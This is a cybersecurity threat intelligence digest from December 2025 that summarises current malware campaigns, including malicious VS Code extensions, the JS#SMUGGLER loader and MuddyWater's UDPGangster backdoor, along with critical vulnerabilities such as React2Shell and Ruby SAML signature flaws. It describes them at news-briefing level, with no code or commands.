Cyware Daily Threat Intelligence, December 09, 2025

Developers are being targeted by a trojan horse campaign that has silently spread for seven years. A massive malware operation has used malicious VSCode extensions to infect over 4.3 million browsers. Masquerading as helpful coding tools, these extensions execute scripts to steal WiFi passwords, hijack sessions, and capture screenshots.

A new threat named JS#SMUGGLER is turning compromised websites into launchpads for sophisticated attacks. This campaign uses an obfuscated JavaScript loader to inject a malicious HTML Application that eventually deploys the NetSupport RAT.

A critical vulnerability in React Server Components, dubbed React2Shell, is being actively exploited by Chinese threat actors. Tracked as CVE-2025-55182, this flaw allows attackers to execute arbitrary code via simple HTTP requests. The vulnerability is widespread, affecting nearly 40% of scanned cloud environments.

Top Malware Reported in the Last 24 Hours

Researchers uncover malicious developer tools

Over seven years, a malware campaign has infected 4.3 million browsers through malicious VS Code extensions, notably Bitcoin Black and Codo AI. These extensions, masquerading as a harmless theme and an AI coding assistant, execute scripts that capture screenshots, steal WiFi passwords, and hijack browser sessions. The attacker evolved their methods, initially using complex PowerShell scripts before transitioning to simpler batch scripts for payload delivery. Additionally, malicious Go and npm packages utilized typosquatting techniques to impersonate trusted libraries, while a Rust package acted as a loader for further malware. DLL hijacking techniques allow the malware to leverage the legitimate Lightshot executable, making detection difficult. 

JS#SMUGGLER campaign deploys NetSupport RAT

A new campaign, dubbed JS#SMUGGLER, has been detected utilizing compromised websites to distribute the NetSupport RAT. This multi-stage attack employs an obfuscated JavaScript loader, which injects an HTML Application (HTA) that runs encrypted PowerShell scripts via "mshta.exe." The JavaScript loader is designed to profile devices, determining whether to serve a full-screen iframe for mobile users or a second-stage script for desktop users. Once the HTA payload is executed, it downloads and executes the PowerShell stager in memory to avoid detection, ultimately deploying the NetSupport RAT. This malware grants attackers complete control over the victim's system, enabling remote desktop access, data theft, and command execution. 

MuddyWater uses new UDPGangster backdoor

MuddyWater, an Iranian hacking group, has been observed deploying a new backdoor known as UDPGangster, utilizing the User Datagram Protocol (UDP) for C2 operations. This cyberespionage campaign targets users in Turkey, Israel, and Azerbaijan through spear-phishing tactics that involve sending booby-trapped Microsoft Word documents. These documents, disguised as invitations to a seminar from the Turkish Republic of Northern Cyprus Ministry of Foreign Affairs, prompt users to enable macros, which execute embedded malicious code. The UDPGangster payload establishes persistence by modifying the Windows Registry and incorporates extensive anti-analysis checks to evade detection. Once operational, it gathers system information and connects to an external server over UDP to exfiltrate data, execute commands, and deploy additional payloads.

Top Vulnerabilities Reported in the Last 24 Hours

React2Shell vulnerability under active exploitation

A critical vulnerability, CVE-2025-55182 (React2Shell), affecting React Server Components is being actively exploited by Chinese threat actors. The vulnerability stems from unsafe payload deserialization at React Server Function endpoints, allowing attackers to execute arbitrary code via crafted HTTP requests. Approximately 39% of scanned cloud environments contain vulnerable React instances, with exploitation attempts showing nearly 100% success rates. Popular frameworks and libraries like Next.js, React Router, and others are also affected by this vulnerability. 

Critical vulnerabilities in Ruby SAML library

A pair of critical vulnerabilities, CVE-2025-66567 and CVE-2025-66568, have been discovered in the Ruby SAML library, which is essential for implementing client-side SAML authorization. Both vulnerabilities have a CVSS score of 9.3, exposing applications to authentication bypass attacks that allow malicious actors to impersonate users without valid credentials. CVE-2025-66567 stems from discrepancies in XML parsing between ReXML and Nokogiri, enabling Signature Wrapping attacks. Meanwhile, CVE-2025-66568 arises from a flaw in the Libxml2 library during the canonicalization process, leading to issues like Digest Bypass and Signature Replay.